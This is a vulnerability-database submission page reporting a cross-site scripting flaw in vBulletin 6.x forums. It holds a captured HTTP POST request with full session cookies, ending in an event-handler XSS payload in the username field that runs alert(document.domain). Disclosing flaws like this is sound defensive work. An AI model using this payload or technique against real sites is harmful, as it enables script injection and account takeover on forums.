| タイトル | Cross Site Scripting no fórum vBulletin 6.xx Vbulletin 6.x.x Cross Site Scripting |
|---|
| 説明 | I am resubmitting report #797374, with proof of concept.
I've identified an XSS vulnerability in the VBulletin forums, across all versions. Here's the post from Burp.
Poc
https://vimeo.com/1186519525?fl=ip&fe=ec
https://ibb.co/ZRPpHLHP
https://github.com/chor4o/CVES/blob/main/Vbulletin
POST / HTTP/2
Host: forum.vbulletin.com
Cookie: usprivacy=1---; eupubconsent-v2=CQiMiHgQiMiHgAcABBENCZFsAP_gAEPgACiQLGwLYAFAAWAA0AC4AGQAOAAhABUADQAHQAPQAiwBMAE2AKAAogBbAC-AGEANAAgwBHACUAFIAOQAeMBBwEIALSAgwBeYDGQGXgRmAjgBOACcYE5gJ0wTsBO8CewE_AJ_gUHAojBVQFVQK8AWHAsaCg8BQABYAFwAOAAqABcADQAHAARQAmABoAEcAOSAg4CEAEWAXeAvMCcwE6YJ2gncBQcAAAAA.f_wACHwAAAAA.ILGwMYAFAAWAA0AC4AGQAOAAhABUAC4AGgAOAAdAA9ACLAEwATYAoACiAFsAL4AYQA0ACDAEcAJQAUgA5AB4wEHAQgAiwBaQEGALvAXmAxkBl4EZgI4ATgAnGBOYCdME7ATvAnsBPwCf4FBwKIwVUBVUCvAFhwLGgAAA; OneTrustWPCCPAGoogleOptOut=false; _ga=GA1.1.2045348690.1775390766; OptanonAlertBoxClosed=2026-04-05T14:06:35.942Z; vblm_sessionhash=d359f6f56a3f300b074d9c0d20d26279; vblm_lastvisit=1776707668; PHPSESSID=rcukmdvaq665gdm257ukk3i3rl; cf_clearance=ZjxI6JiaC0mK5BLdgNhK6XEgitYVQ2PjVv5lWeHBi1g-1777125188-x.x.x.x-t9E0zVvStXomYW37OX5Px9NlnD8Z2m3l5q0Jvo9UxJTdykQhD1.LV4nf7lqsj1thVoAcqc5GV9TSc5SWWVwcv4vEHP6_zp5fCfIxmzARdAOlZJ27LeZqXvvVMgm62X8Y3L_L9GR0l2CzeHPO2fdvU1k8rSQ6qX7mVCEiHTjF1ByxWg4vKM1lv00wuUwc4Ezjwm0yZZihp3ChSw9u3hLUEylN7vUwGMPL9c7EBpMWp4USD._j5WULpru7IH_dplPy2iNTLmy1JzGWaIhbo9su87D3rKi52Wlb186uFPD.LnEMwAX48FSVYbhmRSMaHs6OyUYD9fl78K7JPZ0ee15l3r8hyTQZVt16zrqX2kOLj0RvN6gZhMNbYjMRYOtHgsBzP49KBdZFo_Wl8Dnpj8eclh0NNlbaQsNMz8VUnzqxKuI; __cf_bm=oWUhwmUPaBwfZiL7km86LYT5qDmwPMqDV.Wnahmskb0-1777125188.1108065-x.x.x.x-CYTzCD5LnBXF9YksjuiP4bl_NUP7DBg12rDbbZGRZACcwR_u2XCl7t8q3OYJUBJ7RMyW_if005cVfK_RE1ka1T0cL8LxIdBd_htN3KlNqw5nHQcOfd7dD9d8yYgYefaA; vblm_lastactivity=1777125345; OptanonConsent=isGpcEnabled=0&datestamp=Sat+Apr+25+2026+10%3A55%3A46+GMT-0300+(Hor%C3%A1rio+Padr%C3%A3o+de+Bras%C3%ADlia)&version=202511.1.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=9ae7fb6b-a610-472c-87bb-a870cae59449&interactionCount=3&isAnonUser=1&landingPath=NotLandingPage&groups=C0001%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CV2STACK42%3A1&genVendors=V4%3A1%2CV5%3A0%2C&AwaitingReconsent=false&intType=1&geolocation=BR%3BSP; _ga_VXDJZJWWH6=GS2.1.s1777125188$o12$g1$t1777125346$j19$l0$h0
Content-Length: 104
Sec-Ch-Ua-Full-Version-List:
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: pt-BR,pt;q=0.9
Sec-Ch-Ua: "Chromium";v="143", "Not A(Brand";v="24"
Sec-Ch-Ua-Bitness: ""
Sec-Ch-Ua-Model: ""
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Arch: ""
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Full-Version: ""
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Sec-Ch-Ua-Platform-Version: ""
Origin: https://forum.vbulletin.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://forum.vbulletin.com/
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
username=asd'oncontentvisibilityautostatechange='alert(document.domain)' style='content-visibility:auto' |
|---|
| ソース | ⚠️ https://forum.vbulletin.com |
|---|
| ユーザー | chor4o (UID 52584) |
|---|
| 送信 | 2026年04月25日 16:08 (1 月 ago) |
|---|
| モデレーション | 2026年05月23日 11:39 (28 days later) |
|---|
| ステータス | 承諾済み |
|---|
| VulDBエントリ | 365320 [vBulletin 6.x Login クロスサイトスクリプティング] |
|---|
| ポイント | 17 |
|---|